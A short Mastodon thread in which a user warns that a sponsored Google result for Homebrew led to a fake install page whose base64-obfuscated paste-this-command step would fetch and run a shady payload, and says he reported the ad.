Login
You're viewing the mastodonapp.uk public feed.
  • Will Harriswill_harris
    Nov 11, 2025, 11:57 AM

    Advice to fellow computer-touchers: distrust those install commands you're supposed to copy-paste into your terminal from websites.

    Google's first result when I searched for homebrew (Mac OS package manager) was a sponsored result for a phishing attempt hosted on Google Drive. The so-called install command would fetch and run a bash script that would itself fetch and run a very shady-looking executable payload.

    Screenshot of a Google search result page for the term "homebrew" showing a phishing attempt in the first (sponsored) result above the genuine page.
    Screenshot from a fake Homebrew homepage showing a dodgy install command obfuscated by base64 encoding. I have painted over some of the base64 cipher text in red and added a label that says "NO!".
    💬 1🔄 0⭐ 0

Replies

  • Will Harriswill_harris
    Nov 11, 2025, 12:06 PM

    Looking at the disassembly, I think the binary payload would run some mysterious shell commands. They're mysterious because (1) I'm not a security expert so I don't know how to reverse engineer the obfuscation/encryption and also because (2) I'm not a maniac so I won't just run the thing.

    💬 1🔄 0⭐ 0
  • Will Harriswill_harris
    Nov 11, 2025, 12:13 PM

    Obviously I reported the ad already. I expect to hear back that "We found that the ad doesn’t go against Google’s policies" in the next couple of days.

    💬 0🔄 0⭐ 0